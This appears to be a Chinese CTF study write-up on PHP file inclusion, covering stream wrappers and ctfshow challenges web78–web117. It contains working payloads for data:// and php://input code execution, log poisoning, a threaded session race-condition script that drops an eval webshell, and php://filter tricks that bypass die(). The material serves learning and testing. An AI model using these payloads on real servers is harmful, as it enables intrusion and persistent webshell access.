一.前言

这次去打长城杯半决赛还是发现自己挺多不会的，到蓝桥杯之前还要库库学，每天至少三个题+，绝不偷懒，先开个自己了解过一点的专题

二.知识点

1.什么是文件包含漏洞

和SQL注入等攻击方式一样，文件包含漏洞也是一种注入型漏洞，其本质就是输入一段用户能够控制的脚本或者代码，并让服务端执行。

什么叫包含呢？以PHP为例，我们常常把可重复使用的函数写入到单个文件中，在使用该函数时，直接调用此文件，而无需再次编写函数，这一过程叫做包含。

有时候由于网站功能需求，会让前端用户选择要包含的文件，而开发人员又没有对要包含的文件进行安全考虑，就导致攻击者可以通过修改文件的位置来让后台执行任意文件，从而导致文件包含漏洞。

以PHP为例,常用的文件包含函数有以下四种:
include(),require(),include_once(),require_once()

区别如下:

require():找不到被包含的文件会产生致命错误，并停止脚本运行
include():找不到被包含的文件只会产生警告，脚本继续执行
require_once()与require()类似:唯一的区别是如果该文件的代码已经被包含，则不会再次包含
include_once()与include()类似:唯一的区别是如果该文件的代码已经被包含，则不会再次包含

注意：include()函数并不在意被包含的文件是什么类型，只要有php代码，都会被解析出来

2.常见姿势

通过文件包含写马(web78)

日志包含(web79)

包含session文件(web82)

包含临时文件(web82)

远程文件包含(LFI)

3.php内置伪协议

在web题中伪协议算用的比较多的，那就来详细写一下

PHP提供的一系列特殊的URL封装协议，用于访问文件、流资源或实现特定功能。这些协议通过fopen()、file_get_contents()等函数直接操作，常用于文件处理、数据流控制和I/O操作。

协议	测试PHP版本	allow_url_topen	allow_url_include	作用
file://	>=5.2	off/on	off/on	访问本地文件系统，直接读取或包含文件内容。
php://filter	>=5.2	off/on	off/on	数据流筛选过滤，常用于读取文件源码（如Base64编码）。
php://input	>=5.2	off/on	on	访问原始POST数据流，可执行传入的PHP代码（需`allow_url_include=on`）。
zip://	>=5.2	off/on	off/on	读取ZIP压缩包内指定文件（需绝对路径）。
compressed.bzip2://	>=5.2	off/on	off/on	读取Bzip2压缩文件。
compressed.zlib://	>=5.2	off/on	off/on	读取Zlib压缩文件。
data://	>=5.2	on	on	通过Data URI传递数据，可包含PHP代码（如`data:text/plain,<?php...`）。
phar://	>=5.3	off/on	off/on	将压缩包（如ZIP、PHAR）作为文件处理，可执行包内PHP文件。

着重说几个用的比较多的

php://filter

作用

php://filter 是一种元封装器，设计用于数据流打开时的筛选过滤应用。这对于一体式（all-in-one）的文件函数非常有用，类似 readfile()、 file()和file_get_contents()，在数据流内容读取之前没有机会应用其他过滤器。

简单通俗的说，这是一个中间件，在读入或写入数据的时候对数据进行处理后输出的一个过程。

php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码(如base64-encode编码)，让其不执行。从而导致任意文件读取。

名称	描述
`resource=<要过滤的数据流>`	这个参数是必须的。它指定了你要筛选过滤的数据流。
`read=<读链的筛选列表>`	该参数可选。可以设定一个或多个过滤器名称，以管道符（
`write=<写链的筛选列表>`	该参数可选。可以设定一个或多个过滤器名称，以管道符（
`<；两个链的筛选列表>`	任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。(之前做到一个题要求参数中必须包含一个字符串，这种情况下随便插到中间就行了，因为除了resource，read，write，其余的不解析)

过滤器

1.字符串过滤器

常以string开头，对每个字符都进行同样方式处理

string.rot13：一种字符处理方式，将字符右移13位(相当于凯撒密码)
string.toupper：将所有字符转换为大写
string.tolower：将所有字符转换为小写
string.strip_tags：处理掉读入的所有标签，在处理die()函数(即web87)时有奇效

2.转换过滤器

Conversion Filters（转换过滤器）如同 string. 过滤器，convert.过滤器的作用就和其名字一样。转换过滤器是 PHP 5.0.0添加的。

convert.base64-encode & convert.base64-decode：经常使用，使用base64编解码
convert.quoted-printable-encode & convert.quoted-printable-decode：可以翻译为可打印字符引用编码，使用可以打印的ASCII编码的字符表示各种编码形式下的字符。
**convert.iconv.<input-encoding>.<output-encoding>或convert.iconv.<input-encoding>/<output-encoding>**：这个过滤器需要 php 支持 iconv，而 iconv 是默认编译的。使用convert.iconv.*过滤器等同于用iconv()函数处理所有的流数据。（好像7.3之后就废弃了？）

<input-encoding>和<output-encoding>就是编码方式，有如下几种：

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*

3.压缩过滤器

zlib.deflate（压缩）和zlib.inflate（解压）
bzip2.compress和bzip2.decompress

4.加密过滤器：用处不大，不太了解

**mcrypt.*&mdecrypt.***：libmcrypt 对称加/解密算法

data://

数据流封装器，以传递相应格式的数据。可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行。比如data://text/plain,<?php eval($_POST[123]);，就会将一句话木马执行

也可以使用base64解码，data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbMTIzXSk7，和上面的那个效果相同，可以用来绕过

php://Input

php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。从而导致任意代码执行。比如

http://127.0.0.1/cmd.php?cmd=php://input
POST：<?php phpinfo()?>

注意：当enctype="multipart/form-data"的时候 php://input是无效的

遇到file_get_contents()要想到用php://input绕过。

php://

在allow_url_fopen，allow_url_include都关闭的情况下可以正常使用，作用为访问输入输出流

zip:// & bzip2:// & zlib://协议

zip:// & bzip2:// & zlib:// 均属于压缩流，可以访问压缩文件中的子文件，更重要的是不需要指定后缀名，可修改为任意后缀：jpg png gif xxx 等等。例如zip://[压缩文件绝对路径]%23[压缩文件内的子文件名]（#编码为%23）

phar://协议

phar://协议与zip://类似，同样可以访问zip格式压缩包内容

三.题目

web78(data伪协议/php伪协议/日志注入)

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

一个简单的文件包含，前面做的命令执行中也遇到过，所以说直接使用data伪协议

file=data://text/plain,<?php eval(system("ls"));?>  //flag.php index.php
file=data://text/plain,<?php eval(system("tac flag.php"));?>  //获得flag

看wp也可以直接包含加php伪协议

file=../../flag.php   //先通过相对路径和flag.php对flag文件尝试读取，但是报错No such file or directory,即没有这个文件
file=flag.php      //回显空白但没报错，说明在当前目录下有这个flag.php的文件，但是没有显示，那么可以尝试下php伪协议读取
file=php://filter/read=convert.base64-encode/resource=flag.php    //这里也可以不加上编码返回，只是为了提醒自己，可以看到flag.php文件中只有一个赋值操作，导致无回显

当然，还有一个常见方法就是日志注入(但是由于nginx的日志文件位置我记不到，所以不咋喜欢用)，这个题也可以使用

file=/var/log/nginx/access.log   //成功看到日志文件，且文件中有UA头

将UA改为<?php eval($_POST[123]);?>，访问后，再蚁剑连接就行

看到php被解析了就上传成功了，尝试蚁剑连接

一次成功，然后就是蚁剑里面找flag了

web79(过滤php)

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

不能使用php伪协议，但是<?php中的php可以通过<?=来绕过，<?=等价于<?php echo，所以data伪协议还是能照常使用的

file=data://text/plain,<?= eval(system("ls"));     //flag.php index.php
file=data://text/plain,<?= eval(system("tac flag.php"));      //获得flag

日志注入经过测试也可以使用

看wp还发现了一种姿势，通过input过滤器和php大写绕过，由于这个题环境已经关了，将就下个题的环境做下

首先对?file=Php://input抓post请求包(可抓空包，主要是这里hackbar需要json格式，所以不能直接传参)，然后修改文件内容为<?Php system("ls");?>

可以看到是能够正常回显的，获取flag不演示了，知道方法即可

web80(+data)

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

把data伪协议ban了，还是日志注入好用，同样还有上个题的input可用(图方便直接用上个题演示的拿flag了，不过日志注入也是测了的)

web81(+:)

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

还是日志注入

GET:file=/var/log/nginx/access.log
UA:<?php eval($_POST[123]);?>

web82(+.)(session利用＋条件竞争)

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

把日志注入的access.php也给过滤了，参考wp知道要使用条件竞争，先来学习一下

条件竞争

条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时，就可能会出现bug。尤其在当前我们的系统中大量对资源进行共享，如果处理不当的话，就会产生条件竞争漏洞。说的通俗一点，条件竞争涉及到的就是操作系统中所提到的进程或者线程同步的问题，当一个程序的运行的结果依赖于线程的顺序，处理不当就会发生条件竞争。

首先要知道的是在php的配置文件php.ini中有几个选项

session.upload_progress.enabled = on       //表示upload_progress功能开始，即浏览器向服务器上传一个文件时，php会将这次上传的详细信息(如上传时间，上传进度等)存储在session中
session.upload_progress.cleanup = on       //表示上传结束后，php会立即清空对应session文件中的内容，非常重要！！！！！
session.upload_progress.prefix = "upload_progress_"   //定义session中进度数据的键名前缀，例如进度信息会存储在$_SESSION['upload_progress_xxxx']中。
session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"   //指定上传表单中用于触发进度跟踪的字段名。需要在HTML表单中添加一个同名隐藏字段（如<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS">）。
session.use_strict_mode = off //这个选项默认值为off，表示我们对Cookie中sessionid可控！！！很重要！！！！！！
session.save_path = /var/lib/php/sessions //session的存储位置，默认还有一个 /tmp/目录

session还有一个默认选项，session.use_strict_mode默认值为0。此时用户是可以自己定义Session ID的。比如，我们在Cookie里设置PHPSESSID=TGAO，PHP将会在服务器上创建一个文件：/tmp/sess_TGAO”。即使此时用户没有初始化Session，PHP也会自动初始化Session。并产生一个键值，这个键值有ini.get(“session.upload_progress.prefix”)+由我们构造的session.upload_progress.name值组成，最后被写入sess_TGAO里。

所以，只要在clean之前多次上传含恶意代码的值，就会存储在session中，进而被利用

题目

条件竞争(脚本)

首先还是通过条件竞争，这里直接给个脚本

from requests import get, post
from io import BytesIO
from threading import Thread
from urllib.parse import urljoin

URL = 'http://c550ddd8-2227-4d91-993d-88c5ed06d549.challenge.ctf.show'
PHPSESSID = 'shell'


def write():
    code = "<?php file_put_contents('/var/www/html/shell.php', '<?php eval($_POST[123]);?>');?>"
    data = {'PHP_SESSION_UPLOAD_PROGRESS': code}
    cookies = {'PHPSESSID': PHPSESSID}
    files = {'file': ('xxx.txt', BytesIO(b'x' * 10240))}
    while True:
        post(URL, data, cookies=cookies, files=files)


def read():
    params = {'file': f'/tmp/sess_{PHPSESSID}'}
    max=50
    count=0
    while count<max:
        count+=1
        get(URL, params)
        url = urljoin(URL, 'shell.php')
        code = get(url).status_code.real
        print(f'{url} {code}')
        if code == 200:
            print("成功写入，访问/shell.php密码为123")
            exit()
    print("已达到最大尝试次数50次，未成功。")
    exit()


if __name__ == '__main__':
    Thread(target=write, daemon=True).start()
    read()

条件竞争(BP抓包)

本地创建html文件内容如下

<!DOCTYPE html>
<html>
<body>
<form action="http://bf091406-58ae-4dbf-808d-3987014a356c.challenge.ctf.show/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system("ls");?>" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

bp抓包并添加cookie为PHPSESSID=flag，然后访问/tmp/sess_flag，完整请求包如下(a=1只是为了方便发包攻击)

POST /?file=/tmp/sess_flag HTTP/1.1
Host: bf091406-58ae-4dbf-808d-3987014a356c.challenge.ctf.show
Content-Length: 331
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8isCvKiqHqUao4vp
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Cookie: PHPSESSID=flag

------WebKitFormBoundary8isCvKiqHqUao4vp
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

<?php system("ls");?>
------WebKitFormBoundary8isCvKiqHqUao4vp
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary8isCvKiqHqUao4vp--

a=§1§

有概率不出，重新试下就行

php的小trick(本题不可用，仅作积累)

在这里有个小知识点，/proc/self指向当前进程的/proc/pid/，/proc/self/root/是指向/的符号链接，想到这里，用伪协议配合多级符号链接的办法进行绕过。

file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
也可以用下面一个payload
file=php://filter/convert.base64-encode/resource=/nice/../../proc/self/cwd/flag.php

绕过路径限制的原理
当应用限制文件读取路径（如禁止绝对路径或特定目录）时，通过构造多层符号链接可绕过限制：
重复 /proc/self/root：多次叠加/proc/self/root仍等效于单次/，但可能绕过某些路径检查逻辑（如正则匹配或层级限制）。例如：
/proc/self/root/proc/self/root/.../var/www/html/flag.php → /var/www/html/flag.php
利用 /proc/self/cwd：/proc/self/cwd指向进程的当前工作目录（如 Web 根目录/var/www/html）。通过路径跳转（如/nice/../../）可绕过简单的../过滤：
/nice/../../proc/self/cwd/flag.php → /proc/self/cwd/flag.php → /var/www/html/flag.php

web83(销毁session)

<?php

session_unset();
session_destroy();

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);

    include($file);
}else{
    highlight_file(__FILE__);
}

环境中出现警告Warning: session_destroy(): Trying to destroy uninitialized session in /var/www/html/index.php on line 14，原因如下

在PHP中，session_destroy()函数用于销毁当前会话中的所有数据，并且会话ID也将不再被使用（除非手动重新生成一个新的会话ID）。然而，如果调用session_destroy()之前没有通过session_start()或其他方式初始化Session，就会出现这个警告。

但是对于条件竞争来说，使用的只是创造那一瞬间的session，所以不影响，所以上题的payload都能用

脚本

#可能50次次数有点少，适当调整
from requests import get, post
from io import BytesIO
from threading import Thread
from urllib.parse import urljoin

URL = 'http://cbc05bd5-3a77-48d2-a348-09de3b406f12.challenge.ctf.show/'
PHPSESSID = 'shell'


def write():
    code = "<?php file_put_contents('/var/www/html/shell.php', '<?php eval($_POST[123]);?>');?>"
    data = {'PHP_SESSION_UPLOAD_PROGRESS': code}
    cookies = {'PHPSESSID': PHPSESSID}
    files = {'file': ('xxx.txt', BytesIO(b'x' * 10240))}
    while True:
        post(URL, data, cookies=cookies, files=files)


def read():
    params = {'file': f'/tmp/sess_{PHPSESSID}'}
    max=50
    count=0
    while count<max:
        count+=1
        get(URL, params)
        url = urljoin(URL, 'shell.php')
        code = get(url).status_code.real
        print(f'{url} {code}')
        if code == 200:
            print("成功写入，访问/shell.php密码为123")
            exit()
    print("已达到最大尝试次数50次，未成功。")
    exit()


if __name__ == '__main__':
    Thread(target=write, daemon=True).start()
    read()

BP

同上，请求包如下

POST /?file=/tmp/sess_flag HTTP/1.1
Host: cbc05bd5-3a77-48d2-a348-09de3b406f12.challenge.ctf.show
Content-Length: 331
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8isCvKiqHqUao4vp
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Cookie: PHPSESSID=flag

------WebKitFormBoundary8isCvKiqHqUao4vp
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

<?php system("ls");?>
------WebKitFormBoundary8isCvKiqHqUao4vp
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary8isCvKiqHqUao4vp--

a=§1§

web84(删除/tmp下的所有文件)

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    system("rm -rf /tmp/*");
    include($file);
}else{
    highlight_file(__FILE__);
}

这次要删除/tmp下的所有文件，所以使用脚本直接上传马，只要线程开的大竞争过了就行

#可能50次次数有点少，适当调整
from requests import get, post
from io import BytesIO
from threading import Thread
from urllib.parse import urljoin

URL = 'http://467ac67b-2063-486d-97c5-d926593af583.challenge.ctf.show/'
PHPSESSID = 'shell'


def write():
    code = "<?php file_put_contents('/var/www/html/shell.php', '<?php eval($_POST[123]);?>');?>"
    data = {'PHP_SESSION_UPLOAD_PROGRESS': code}
    cookies = {'PHPSESSID': PHPSESSID}
    files = {'file': ('xxx.txt', BytesIO(b'x' * 10240))}
    while True:
        post(URL, data, cookies=cookies, files=files)


def read():
    params = {'file': f'/tmp/sess_{PHPSESSID}'}
    max=50
    count=0
    while count<max:
        count+=1
        get(URL, params)
        url = urljoin(URL, 'shell.php')
        code = get(url).status_code.real
        print(f'{url} {code}')
        if code == 200:
            print("成功写入，访问/shell.php密码为123")
            exit()
    print("已达到最大尝试次数50次，未成功。")
    exit()


if __name__ == '__main__':
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    read()

web85(匹配文件内字符)

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    if(file_exists($file)){
        $content = file_get_contents($file);
        if(strpos($content, "<")>0){
            die("error");
        }
        include($file);
    }
    
}else{
    highlight_file(__FILE__);
}

要匹配文件中的内容，但是好像不影响条件竞争，接着上脚本

#可能50次次数有点少，适当调整
from requests import get, post
from io import BytesIO
from threading import Thread
from urllib.parse import urljoin

URL = 'http://e63797fa-6fab-482d-82b5-9f2e31f9c1d8.challenge.ctf.show'
PHPSESSID = 'shell'


def write():
    code = "<?php file_put_contents('/var/www/html/shell.php', '<?php eval($_POST[123]);?>');?>"
    data = {'PHP_SESSION_UPLOAD_PROGRESS': code}
    cookies = {'PHPSESSID': PHPSESSID}
    files = {'file': ('xxx.txt', BytesIO(b'x' * 10240))}
    while True:
        post(URL, data, cookies=cookies, files=files)


def read():
    params = {'file': f'/tmp/sess_{PHPSESSID}'}
    max=50
    count=0
    while count<max:
        count+=1
        get(URL, params)
        url = urljoin(URL, 'shell.php')
        code = get(url).status_code.real
        print(f'{url} {code}')
        if code == 200:
            print("成功写入，访问/shell.php密码为123")
            exit()
    print("已达到最大尝试次数50次，未成功。")
    exit()


if __name__ == '__main__':
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    read()

web86(设置包含路径)

<?php

define('还要秀？', dirname(__FILE__));
set_include_path(还要秀？);
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);

    
}else{
    highlight_file(__FILE__);
}

同上，直接脚本

#可能50次次数有点少，适当调整
from requests import get, post
from io import BytesIO
from threading import Thread
from urllib.parse import urljoin

URL = 'http://101048a2-77c7-4b6b-844d-233f0675a42d.challenge.ctf.show'
PHPSESSID = 'shell'


def write():
    code = "<?php file_put_contents('/var/www/html/shell.php', '<?php eval($_POST[123]);?>');?>"
    data = {'PHP_SESSION_UPLOAD_PROGRESS': code}
    cookies = {'PHPSESSID': PHPSESSID}
    files = {'file': ('xxx.txt', BytesIO(b'x' * 10240))}
    while True:
        post(URL, data, cookies=cookies, files=files)


def read():
    params = {'file': f'/tmp/sess_{PHPSESSID}'}
    max=50
    count=0
    while count<max:
        count+=1
        get(URL, params)
        url = urljoin(URL, 'shell.php')
        code = get(url).status_code.real
        print(f'{url} {code}')
        if code == 200:
            print("成功写入，访问/shell.php密码为123")
            exit()
    print("已达到最大尝试次数50次，未成功。")
    exit()


if __name__ == '__main__':
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    Thread(target=write, daemon=True).start()
    read()

web87(绕过die()函数)

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

    
}else{
    highlight_file(__FILE__);
}

简单来说就是将file参数进行url解码后如果存在(url中参数在传入时若未url编码会自动url编解码一次，若编码了就只解码一次，所以为了处理urldecode函数，要对file参数二次编码)，就把<?php die('大佬别秀了');?>和POST传入的content插入到文件中，所以就要通过绕过来避免die()函数被使用，以下为几种方法

filter的base64-decode绕过

原理

base64在编码时，只会编码范围内的字符，即A-Z、a-z、0-9、+、/，多余的字符会被跳过，因此如果是通过这种方式将<?php die('大佬别秀了');?>写入文件时，只会留下phpdie和content的内容，那这时php不会被解析，就可以放心的向content里面写一句话木马了

实操

首先要知道base64编码是四个字节一组，但是phpdie中只有6个字节，所以要在content参数base64编码后的结果中补两个字节(范围内任意两个字节，这里以aa为例)

GET:file=%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%34%25%36%35%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%37%33%25%36%38%25%36%35%25%36%43%25%36%43%25%32%45%25%37%30%25%36%38%25%37%30
//二次编码后的结果，原始为file=php://write=convert.base64-decode/resource=shell.php,注意要完全url编码
POST:content=aaPD9waHAgZXZhbCgkX1BPU1RbMTIzXSk7Pz4=
//原始为content=<?php eval($_POST[123]);?>，注意aa是为了补字节数加的

写入之后访问shell.php，蚁剑或传参123均可

rot13编码绕过(适用于未开启短标签的情况)

原理

<?php die();?>经过 rot13 编码会变成<?cuc qvr();?>，如果 php 未开启短标签，则不会解析这段代码，也就不会执行。

实操

GET:file=%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%37%33%25%37%34%25%37%32%25%36%39%25%36%45%25%36%37%25%32%45%25%37%32%25%36%46%25%37%34%25%33%31%25%33%33%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%32%45%25%37%30%25%36%38%25%37%30
//原始为file=php://filter/write=string.rot13/resource=1.php
POST:content=<?cuc riny($_cbfg[123]);?>
//原始为content=<?php eval($_POST[123]);?>

这里要注意，工具一把梭梭炸了，rot13的编码规律就是将字母替换为13位后的字母，但是在这个过程中用的在线编码网站不区分大小写，导致传上去的是<?php eval($_post[123]);?>，所以不能正常使用，POST传参应为

content=<?cuc riny($_CBFG[123]);?>，然后正常传参打就能拿flag了。

通过strip_tags函数去除XML标签

原理

<?php die();?> 实际上就是一个 XML 标签，我们可以通过strip_tags函数去除它。

实操

GET:file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%33%25%37%34%25%37%32%25%36%39%25%37%30%25%35%66%25%37%34%25%36%31%25%36%37%25%37%33%25%37%63%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%36%38%25%36%31%25%36%33%25%36%62%25%32%65%25%37%30%25%36%38%25%37%30
//原始为file=php://filter/write=string.strip_tags|convert.base64-decode/resource=hack.php
POST:content=PD9waHAgZXZhbCgkX1BPU1RbMTIzXSk7Pz4=
//原始为content=<?php eval($_POST[123]);?>

但是提示string.strip_tags已经被停用了，但是不影响，这里访问hack.php后传参就可以正常使用

web88(base64解码绕过文件限制)

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

没过滤data了那么最简单的做法还是通过data伪协议来做

GET:file=data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbMTIzXSk7
//原始为<?php eval($_POST[123]);
POST:123=system("ls");

web116(视频分离出源码)

一进去就是一个视频，其他也没啥东西了，把视频下下来丢随波逐流分析下

可以提取个PNG图片，就是该题源码

<? php
function filter($x) {
    if (preg_match('/http|https|data|input|rot13|base64|string|log|sess/i',$x)){       
        die('too young too simple sometimes native!');
     }
}
$file =isset($_GET['file'])?$_GET['file']:"sp2.mp4";
header('Content-Type:video/mp4');
filter($file);
echo file_get_contents($file);
?>

直接文件包含就行，注意这里可以通过hackbar，将mode设置为raw，跟bp差不多，不然还要去抓包拦截

web117(绕过die()函数)

<?php

highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

类似于web87的思路，还是通过向文件中写马实现，不过由于base64和rot13都被禁用了，所以换其他姿势

GET:file=php://filter/write=convert.iconv.UCS-2BE.UCS-2LE/resource=shell.php
POST:contents=?<hp pvela$(P_SO[T21]3;)
//原始为contents=<?php eval($_POST[123]);

贴一个从UCS-2LE编码转换为UCS-2BE的编码脚本

<?php
$re = iconv("UCS-2LE","UCS-2BE", '<?php eval($_POST[123]);');
echo $re;
?>

成功写入后就能去获取flag了